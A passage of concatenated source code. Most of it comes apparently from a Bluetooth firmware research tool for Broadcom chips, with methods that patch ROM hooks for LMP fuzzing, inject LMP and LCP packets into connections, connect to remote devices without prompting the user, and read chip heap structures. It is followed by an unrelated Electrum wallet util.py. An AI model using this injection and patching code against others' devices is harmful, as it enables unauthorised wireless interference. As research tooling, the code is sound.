"FUZZLMP_ASM_CODE",
"FUZZLMP_HOOK_ADDRESS",
]:
if const not in dir(self.fw):
self.logger.warning(
"fuzzLmpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# Assemble the snippet and write it to FUZZLMP_CODE_BASE_ADDRESS
code = asm(
self.fw.FUZZLMP_ASM_CODE,
vma=self.fw.FUZZLMP_CODE_BASE_ADDRESS,
arch="thumb",
)
self.writeMem(self.fw.FUZZLMP_CODE_BASE_ADDRESS, code)
# Install a patch in the end of the original sendLmpPdu HCI handler
patch = asm(
"b 0x%x" % self.fw.FUZZLMP_CODE_BASE_ADDRESS,
vma=self.fw.FUZZLMP_HOOK_ADDRESS,
)
if not self.patchRom(self.fw.FUZZLMP_HOOK_ADDRESS, patch):
self.logger.warning("Error writing to patchram when installing fuzzLmp patch!")
return False
return True
@needs_pwnlib
def sendLmpPacketLegacy(self, conn_nr, opcode, payload, extended_op=False):
# type: (int, Opcode, bytes, bool) -> bool
"""
Inject a LMP packet into a Bluetooth connection (i.e. send a LMP packet
to a remote device which is paired and connected with our local device).
This is legacy code only running on BCM4339 based on assembly patches.
conn_nr: The connection number specifying the connection into which the
packet will be injected.
opcode: The LMP opcode of the LMP packet that will be injected.
payload: The LMP payload of the LMP packet that will be injected.
Note: The size of the payload is defined by its opcode.
TODO: Go one step deeper in order to send arbitrary length
LMP packets.
extended_op: Set to True if the opcode should be interpreted as extended / escaped
LMP opcode.
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in [
"CONNECTION_MAX",
"SENDLMP_CODE_BASE_ADDRESS",
"SENDLMP_ASM_CODE",
]:
if const not in dir(self.fw):
self.logger.warning(
"sendLmpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# connection number bounds check
if conn_nr < 1 or conn_nr > self.fw.CONNECTION_MAX:
self.logger.warning("sendLmpPacket: connection number out of bounds: %d" % conn_nr)
return False
# Build the LMP packet
# (The TID bit will later be set in the assembler code)
opcode_data = p8(opcode << 1) if not extended_op else p8(0x7F << 1) + p8(opcode)
data = opcode_data + payload
# Prepare the assembler snippet by injecting the connection number
# and appending the LMP packet data.
asm_code = self.fw.SENDLMP_ASM_CODE % (conn_nr) # type: str
asm_code_with_data = asm_code + "".join(
[".byte 0x%02x\n" % x for x in data.ljust(20, b"\x00")]
)
# Assemble the snippet and write it to SENDLMP_CODE_BASE_ADDRESS
code = asm(
asm_code_with_data, vma=self.fw.SENDLMP_CODE_BASE_ADDRESS, arch="thumb"
)
self.writeMem(self.fw.SENDLMP_CODE_BASE_ADDRESS, code)
# Invoke the snippet
if self.launchRam(self.fw.SENDLMP_CODE_BASE_ADDRESS):
return True
else:
self.logger.warning("sendLmpPacket: launchRam failed!")
return False
@needs_pwnlib
def sendLcpPacket(self, conn_idx, payload):
# type: (ConnectionIndex, bytes) -> bool
"""
Inject a LCP packet into a Bluetooth LE connection (i.e. send a LCP packet
to a remote device which is paired and connected with our local device).
This is code requires assembly patches.
conn_idx: The connection index specifying the connection into which the
packet will be injected, starting at 0.
payload: The LCP opcode and payload of the LCP packet that will be injected.
Returns True on success and False on failure.
"""
# Check if constants are defined in fw.py
for const in ["SENDLCP_CODE_BASE_ADDRESS", "SENDLCP_ASM_CODE"]:
if const not in dir(self.fw):
self.logger.warning(
"sendLcpPacket: '%s' not in fw.py. FEATURE NOT SUPPORTED!" % const
)
return False
# Prepare the assembler snippet by injecting the connection number
# and appending the LMP packet data.
asm_code = self.fw.SENDLCP_ASM_CODE % (conn_idx, len(payload))
asm_code_with_data = asm_code + "".join(
[".byte 0x%02x\n" % x for x in payload.ljust(20, b"\x00")]
)
# Assemble the snippet and write it to SENDLCP_CODE_BASE_ADDRESS
code = asm(
asm_code_with_data, vma=self.fw.SENDLCP_CODE_BASE_ADDRESS, arch="thumb"
)
self.writeMem(self.fw.SENDLCP_CODE_BASE_ADDRESS, code)
# Invoke the snippet
if self.launchRam(self.fw.SENDLCP_CODE_BASE_ADDRESS):
return True
else:
self.logger.warning("sendLcpPacket: launchRam failed!")
return False
def connectToRemoteDevice(self, bt_addr):
# type: (BluetoothAddress) -> None
"""
Send a HCI Connect Command to the firmware. This will setup
a connection (inserted into the connection structure) if the
remote device (specified by bt_addr) accepts.
To be exact: This will most likely send
- LMP_features_req
- LMP_version_req
- LMP_features_req_ext
- LMP_host_connection_req
- LMP_setup_complete
and also other channel-related packets to the remote device.
The devices do not have to be paired and the remote device
does not need to be visible. This will not initiate the
pairing sequence, therefore the remote host will not show
any notification to the user yet, the host is however notified
via HCI that there is an incomming connection.
bt_addr: address of remote device (byte string)
e.g. for 'f8:95:c7:83:f8:11' you would pass
b'\xf8\x95\xc7\x83\xf8\x11'.
"""
# TODO: expose more of the connection create parameters (instead of
# passing 0's.
self.sendHciCommand(
HCI_COMND.Create_Connection, bt_addr[::-1] + b"\x00\x00\x00\x00\x00\x00\x01"
)
def connectToRemoteLEDevice(self, bt_addr, addr_type=0x00):
# type: (BluetoothAddress, int) -> None
"""
Send a HCI LE Create Connection Command to the firmware as
defined in the Bluetooth Core Specification 5.0 p. 1266.
bt_addr: address of remote device (byte string)
e.g. for 'f8:95:c7:83:f8:11' you would pass
b'\xf8\x95\xc7\x83\xf8\x11'.
addr_type: Public Device (0x00), Random Device (0x01), Public
Identity (0x02), Random static Identity (0x03).
"""
# TODO: expose more of the connection create parameters (instead of
# passing 0's.
self.sendHciCommand(
HCI_COMND.LE_Create_Connection,
b"\x60\x00\x30\x00\x00"
+ p8(addr_type)
+ bt_addr[::-1]
+ b"\x01\x18\x00\x28\x00\x00\x00\xd0\x07\x00\x00\x00\x00",
)
def connectionStatusCallback(self, record):
# type: (Record) -> None
"""
HCI Callback function to detect HCI Events related to
Create Connection
"""
_hcipkt = record[0]
if not issubclass(_hcipkt.__class__, hci.HCI_Event):
return
hcipkt: hci.HCI_Event = cast(hci.HCI_Event, _hcipkt) # get HCI Event packet
# Check if event is Connection Create Status Event
if hcipkt.event_code == 0x0F:
if u16(hcipkt.data[2:4]) == 0x0405: # Create Connection HCI Cmd
self.logger.info("[Connection Create initiated]")
return
# Check if event is Connection Create Complete Event
if hcipkt.event_code == 0x03:
status = hcipkt.data[0]
status_str = (
hex(status)
if status not in hcipkt.HCI_COMMAND_ERROR_STR
else hcipkt.HCI_COMMAND_ERROR_STR[status]
)
conn_handle = u16(hcipkt.data[1:3])
btaddr = hcipkt.data[3:9][::-1]
# btaddr_str = ":".join([b.encode("hex") for b in btaddr])
btaddr_str = bytes_to_hex(btaddr)
self.logger.info(
"[Connect Complete: Handle=0x%x Address=%s status=%s]"
% (conn_handle, btaddr_str, status_str)
)
# Also show Disconnect Complete
if hcipkt.event_code == 0x05:
conn_handle = u16(hcipkt.data[1:3])
self.logger.info("[Disconnect Complete: Handle=0x%x]" % (conn_handle))
def coexStatusCallback(self, record):
# type: (Record) -> None
"""
Coexistence Callback Function
Interprets debug counters for coexistence with WiFi/LTE
Call with "sendhcicmd 0xfc90"
"""
hcipkt = record[0] # get HCI Event packet
timestamp = record[5] # get timestamp
if not issubclass(hcipkt.__class__, hci.HCI_Event):
return
# Command complete event with stats
if hcipkt.event_code == 0x0E:
if u16(hcipkt.data[1:3]) == 0xFC90: # Coex Statistics Cmd
coex_grant = u32(hcipkt.data[4:8])
coex_reject = u32(hcipkt.data[8:12])
ratio = 0
if coex_grant > 0:
ratio = coex_reject / float(coex_grant)
self.logger.info(
"[Coexistence Statistics: Grant=%d Reject=%d -> Reject Ratio %.4f]"
% (coex_grant, coex_reject, ratio)
)
return
def readHeapInformation(self):
# type: () -> Optional[Union[List[HeapInformation], bool]]
"""
Traverses the double-linked list of BLOC structs and returns them as a
list of dictionaries. The dicts have the following fields:
- index: Index of the BLOC struct inside the double-linked list
- address: Address of the BLOC struct
- list_length: Number of available buffers currently in the list
- capacity: Total number of buffers belonging to the struct
- buffer_list: Head of the buffer list (single-linked list)
- memory: Address of the backing buffer in memory
- memory_size: Size of the backing buffer in memory
- buffer_size: Size of a single buffer in the list
- thread_waitlist: Head of the list of threads, that wait for a buffer to become available
- waitlist_length: Length of the waiting list
- prev: Previous BLOC struct (double-linked list)
- next: Next BLOC struct (double-linked list)
- buffer_headers: Dictionoary containing buffer headers (e.g. free linked list)
"""
# Check if constants are defined in fw.py
for const in ["BLOC_HEAD"]:
if const not in dir(self.fw):
self.logger.warning(
"readHeapInformation: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
% const
)
return False
# Read address of first bloc struct:
first_bloc_struct_address = Address(u32(self.readMem(self.fw.BLOC_HEAD, 4)))
# Traverse the double-linked list
bloclist = []
current_bloc_struct_address = first_bloc_struct_address
for index in range(
100
): # Traverse at most 100 (don't loop forever if linked-list is corrupted)
# Parsing BLOC struct
bloc_struct = self.readMem(current_bloc_struct_address, 0x30)
# New Bloc Struct since ~2014
if "BLOC_NG" in dir(self.fw):
bloc_fields = struct.unpack("IHBBIIBB", bloc_struct[:18])
current_element = {}
current_element["index"] = index
current_element["address"] = current_bloc_struct_address
current_element["next"] = bloc_fields[0]
current_element["buffer_size"] = bloc_fields[1]
current_element["capacity"] = bloc_fields[2]
current_element["memory"] = bloc_fields[4]
current_element["buffer_list"] = bloc_fields[5]
current_element["list_length"] = bloc_fields[6]
current_element["memory_size"] = current_element["capacity"] * (
4 + current_element["buffer_size"]
)
# current_element["memory_size"] = bloc_fields[6]
# current_element["thread_waitlist"] = bloc_fields[8]
# current_element["waitlist_length"] = bloc_fields[9]
# current_element["prev"] = bloc_fields[11]
current_element["buffer_headers"] = {}
# Old BLOC Struct
else:
bloc_fields = struct.unpack("I" * 12, bloc_struct)
if bloc_fields[0] != u32(b"COLB"):
self.logger.warning(
"readHeapInformation: BLOC double-linked list contains non-BLOC element. abort."
)
return None
current_element = {}
current_element["index"] = index
current_element["address"] = current_bloc_struct_address
current_element["list_length"] = bloc_fields[2]
current_element["capacity"] = bloc_fields[3]
current_element["buffer_list"] = bloc_fields[4]
current_element["memory"] = bloc_fields[5]
current_element["memory_size"] = bloc_fields[6]
current_element["buffer_size"] = bloc_fields[7]
current_element["thread_waitlist"] = bloc_fields[8]
current_element["waitlist_length"] = bloc_fields[9]
current_element["next"] = bloc_fields[10]
current_element["prev"] = bloc_fields[11]
current_element["buffer_headers"] = {}
# Parsing buffer headers
buffer_size = current_element["buffer_size"] + 4
for buf_index in range(current_element["capacity"]):
buffer_address = current_element["memory"] + buf_index * buffer_size
hdr = u32(self.readMem(buffer_address, 4))
current_element["buffer_headers"][buffer_address] = hdr
# Append and iterate
bloclist.append(current_element)
current_bloc_struct_address = current_element["next"]
if (
current_bloc_struct_address == first_bloc_struct_address
or current_bloc_struct_address == 0
):
break
return bloclist
def readMemoryPoolStatisticsCallback(self, record):
# type: (Record) -> Optional[Union[List[MemoryPool], bool]]
"""
The chip can be put into a mode that enables displaying
memory pool statistics each second with the HCI command
0xfd1c (VSC DBFW) 0x50 (Read Memory Pool Statistics).
Extracted the info about this from a Mojave PacketLogger,
saw it once on an iPhone XS (Aladdin) in action and then
tested it on a Samsung Galaxy S10e and it works.
In contrast to the readHeapInformation command, this does
not manually traverse and check the heap. This means that
this variant is faster but cannot perform checks for
heap corruptions.
TODO: There might be more subcommands, maybe also check out
0x51 (Logging over PCIe) and 0x02 (Write Trace Config).
"""
_hcipkt = record[0]
if not issubclass(_hcipkt.__class__, hci.HCI_Event):
return
hcipkt: hci.HCI_Event = cast(hci.HCI_Event, _hcipkt) # get HCI Event packet
# Check if event is Connection Create Status Event
if hcipkt.event_code == 0xFF and hcipkt.data[0:2] == b'\x1b\x08': # Dump Type 8
self.logger.debug("[MemPool Statistics Received]")
# Pool Meta Information
pool_meta = struct.unpack("<HIIII", hcipkt.data[3:21])
meta_info = {}
meta_info["hci_count"] = pool_meta[0] # Dumped HCI Packet Count
meta_info["free_min"] = pool_meta[1] # Free Memory Min Address
meta_info["free_max"] = pool_meta[2] # Free Memory Max Address Plus One
meta_info["time"] = pool_meta[3] # Timestamp
meta_info["rfu"] = pool_meta[4] # RFU
self.logger.debug(meta_info)
# Individual Pool Information
pool_list = []
pool_len = hcipkt.data[2] # Number of Pools
for index in range(pool_len):
pool_fields = struct.unpack("<IIIHHHHHH", hcipkt.data[21 + (index * 24):21 + ((index + 1) * 24)])
current_element = {}
current_element["index"] = index
current_element["base"] = pool_fields[0] # Base
current_element["first"] = pool_fields[1] # First Free
current_element["name"] = pool_fields[2].to_bytes(4, byteorder='little').decode('utf-8') # Name
current_element["size"] = pool_fields[3] # Block Size
current_element["count"] = pool_fields[4] # Block Count
current_element["low"] = pool_fields[5] # Low Watermark
current_element["allocated"] = pool_fields[6] # Allocated Blocks
current_element["free"] = pool_fields[7] # Free Blocks
current_element["die"] = pool_fields[8] # Die Reserve Count
self.logger.debug(current_element)
pool_list.append(current_element)
# We're called asynchronous so we can return but printing in the
# command line does not really make sense.
self.logger.info((
"\n> Pools at {time}, Min Addr 0x{free_min:06X}, "
"Max Addr 0x{free_max:06X}"
).format(**meta_info))
self.logger.info(" Name @ Base: Size Alloc / Cnt 1st Free Low Die ")
self.logger.info(" ----------------------------------------------------------")
for pool in pool_list:
self.logger.info((
" {name} @ 0x{base:06X}: {size:6d}"
" {allocated:3d} / {count:3d} "
"0x{first:06X} {low:3d} {die:3d}"
).format(**pool))
return pool_list
return
def readQueueInformation(self):
# type: () -> Optional[List[QueueElement]]
"""
Traverses the double-linked list of QUEUE structs and returns them as a
list of dictionaries. The dicts have the following fields:
- index: Index of the BLOC struct inside the double-linked list
- address: Address of the BLOC struct
- item_size: Size of a single queue item (in Byte)
- capacity: Total number of queue items belonging to the struct
- available_items: Number of valid queue items ready to be retrieved
- free_slots: Number of free item slots
- queue_buf_start: Pointer to the beginning of the queue buffer
- queue_buf_end: Pointer to the end of the queue buffer
- next_item: Pointer to the next item to be retrieved from the queue
- next_free_slot: Pointer to the next free item slot to be filled
- thread_waitlist: Head of the list of threads, that wait for a buffer to become available
- waitlist_length: Length of the waiting list
- prev: Previous BLOC struct (double-linked list)
- next: Next BLOC struct (double-linked list)
- items: List of queue items (raw bytes)
- name: Name of the queue (from reverse engineering its usage)
"""
# Check if constants are defined in fw.py
for const in ["QUEUE_HEAD"]:
if const not in dir(self.fw):
self.logger.warning(
"readQueueInformation: '%s' not in fw.py. FEATURE NOT SUPPORTED!"
% const
)
return None
# Read address of first queue struct:
first_queue_struct_address = u32(self.readMem(self.fw.QUEUE_HEAD, 4))
# Traverse the double-linked list
queuelist = []
current_queue_struct_address = first_queue_struct_address
for index in range(
100
): # Traverse at most 100 (don't loop forever if linked-list is corrupted)
queue_struct = self.readMem(current_queue_struct_address, 0x38)
queue_fields = struct.unpack("I" * 14, queue_struct)
if queue_fields[0] != u32(b"UEUQ"):
self.logger.warning(
"readQueueInformation: QUEUE double-linked list contains non-QUEU element. abort."
)
return None
current_element = QueueElement(
index,
current_queue_struct_address,
queue_fields[2] * 4,
queue_fields[3],
queue_fields[4],
queue_fields[5],
queue_fields[6],
queue_fields[7],
queue_fields[8],
queue_fields[9],
queue_fields[10],
queue_fields[11],
queue_fields[12],
queue_fields[13],
self.fw.QUEUE_NAMES[index],
)
queuelist.append(current_element)
current_queue_struct_address = current_element["next"]
if current_queue_struct_address == first_queue_struct_address:
break
return queuelist
def enableBroadcomDiagnosticLogging(self, enable):
# type: (bool) -> None
"""
Broadcom implemented their own H4 layer protocol. Normally H4 handles HCI
messages like HCI commands, SCO and ACL data, and HCI events. Their types are
0x01-0x04. Broadcoms proprietary message type is 0x07 to handle diagnostic
messages.
Diagnostic logging sets a variable checked for any LMP/LCP message when
sending and receiving and then forwarding its contents prepended with 0x07.
In principle, diagnostic logging can be enabled on Android by directly
writing to the serial Bluetooth device:
echo -ne '\x07\xf0\x01' >/dev/ttyHS
However, Androids Bluetooth driver is not properly parsing message type 0x07.
This causes the driver to crash when enabling diagnostics like this. A
custom Bluetooth driver is required, which accepts diagnostic commands
and also forwards diagnostic message outputs to the BT Snoop Log.
"""
if not self.serial:
self.sendH4(hci.HCI.BCM_DIAG, b"\xf0" + b"\x01" if enable else b"\x00")
# We can send the activation to the serial, but then the Android driver
# itself crashes when receiving diagnostic frames...
else:
self.logger.warning("Diagnostic protocol requires modified Android driver!")
def enableEnhancedAdvReport(self):
# type: () -> bool
"""
Broadcom and Cypress chips can extend the "Event Type" field in LE Advertising
Reports with information on the channel, antenna, and scan mode.
Parsing this enhanced advertisement report is "documented" in the PacketDecoder
binary of Apple's PacketLogger, which is part of the Additional Tools for XCode.
The function parsing these is called `leAdvertisingEventTypeString` (XCode 11.4).
Usually, the Event Type field is set to 0x00-0x04, meaning ADV_IND..SCAN_RSP.
Additional fields:
channel = (event_type >> 4) & 7
antenna = event_type & 0x80
scan_mode = (event_type >> 3) & 3
The channel is a value 0--2, which corresponds to 37--39.
The antenna is 0 for BT and 1 for WLAN.
No idea about the scan mode ;)
The Broadcom and Cypress firmware sets these additional fields when the firmware
flag `bEnhancedAdvReport` is set. We do not know how to set it via VSC HCI and if that
is possible, so we set it by directly writing to RAM.
TODO: Also implement for the MacBook 2016, it's at 0x2037D0, but we don't know
the current LMP version, as it changes with each macOS patch level.
Won't Fix:
* The Nexus 5 BLE implementation is too old, `lculp_HandleScanReport` (0x184D0) and
`_scanTaskRxHeaderDone` (0x16E74) do not reference this flag yet.
* Also seems to be missing in the Nexus 6P/Samsung Galaxy S6 but didn't check as careful.
Returns true if the feature is supported and could be enabled.
"""
# Check if constants are defined in fw.py
if "ENHANCED_ADV_REPORT_ADDRESS" not in dir(self.fw):
self.logger.warning(
"enableEnhancedAdvReport: 'ENHANCED_ADV_REPORT_ADDRESS' not in fw.py. FEATURE NOT SUPPORTED!"
)
return False
self.writeMem(self.fw.ENHANCED_ADV_REPORT_ADDRESS, b'\x01\x00\x00\x00')
def _setupSockets(self):
raise NotImplementedError()
def _teardownSockets(self):
raise NotImplementedError()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
base_units = {'BTC':8, 'mBTC':5, 'uBTC':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh_builder = lambda x: bytes.fromhex(x)
def hfu(x):
"""
py2-py3 aware wrapper for str.encode('hex')
:param x: str
:return: str
"""
assert_bytes(x)
return binascii.hexlify(x)
def bfh(x):
"""
py2-py3 aware wrapper to "bytes.fromhex()" func
:param x: str
:rtype: bytes
"""
if isinstance(x, str):
return bfh_builder(x)
# TODO: check for iterator interface
elif isinstance(x, (list, tuple, map)):
return [bfh(sub) for sub in x]
else:
raise TypeError('Unexpected type: ' + str(type(x)))
def bh2u(x):
"""
unicode with hex representation of bytes()
e.g. x = bytes([1, 2, 10])
bh2u(x) -> '01020A'
:param x: bytes
:rtype: str
"""
assert_bytes(x)
return binascii.hexlify(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Biteasy.com': ('https://www.biteasy.com/blockchain',
{'tx': 'transactions', 'addr': 'addresses'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp',
{'tx': 'Transaction', 'addr': 'Address'}),
'Blockchain.info': ('https://blockchain.info',
{'tx': 'tx', 'addr': 'address'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion',
{'tx': 'tx', 'addr': 'address'}),
'Blockr.io': ('https://btc.blockr.io',
{'tx': 'tx/info', 'addr': 'address/info'}),
'Blocktrail.com': ('https://www.blocktrail.com/BTC',
{'tx': 'tx', 'addr': 'address'}),
'BTC.com': ('https://chain.btc.com',
{'tx': 'tx', 'addr': 'address'}),
'Chain.so': ('https://www.chain.so',
{'tx': 'tx/BTC', 'addr': 'address/BTC'}),
'Insight.is': ('https://insight.bitpay.com',
{'tx': 'tx', 'addr': 'address'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain',
{'tx': 'tx', 'addr': 'address'}),
'BlockCypher.com': ('https://live.blockcypher.com/btc',
{'tx': 'tx', 'addr': 'address'}),
'Blockchair.com': ('https://blockchair.com/bitcoin',
{'tx': 'transaction', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
